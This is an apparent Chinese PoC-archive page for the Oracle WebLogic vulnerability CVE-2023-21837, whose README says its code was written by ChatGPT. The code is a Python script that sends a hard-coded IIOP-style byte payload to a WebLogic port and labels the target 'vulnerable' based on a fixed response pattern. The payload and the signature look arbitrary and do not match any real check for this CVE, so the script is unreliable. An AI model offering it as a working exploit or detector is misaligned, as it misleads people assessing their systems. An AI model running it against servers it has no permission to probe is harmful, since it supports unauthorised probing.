关联漏洞
标题:Oracle WebLogic Server 安全漏洞 (CVE-2023-21837)Description:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
Description
POC,EXP, chatGPT for me
介绍
# CVE-2023-21837
POC,EXP, chatGPT for me
## code
```
import socket
# CVE-2023-21837
def check_vulnerability(target_host, target_port):
# create socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set timeout to 30 seconds
s.settimeout(30)
try:
# connect to target
s.connect((target_host, target_port))
# send exploit payload
s.send(b'\x49\x49\x4f\x50\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00')
# receive response
response = s.recv(1024)
# check if response indicates vulnerability
if b'Y\x02\x0f\x00\x00\x00\x00\x00\x00\x00' in response:
print(f"Target {target_host}:{target_port} is vulnerable!")
else:
print(f"Target {target_host}:{target_port} is not vulnerable.")
except socket.timeout:
print(f"Connection to {target_host}:{target_port} timed out.")
except ConnectionRefusedError:
print(f"Connection to {target_host}:{target_port} was refused.")
except Exception as e:
print(f"Error: {e}")
finally:
# close socket
s.close()
# example usage
check_vulnerability('127.0.0.1', 7001)
```
文件快照
[4.0K] /data/pocs/25e517365a0b489784f05caf2c618f935f0d93d2
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。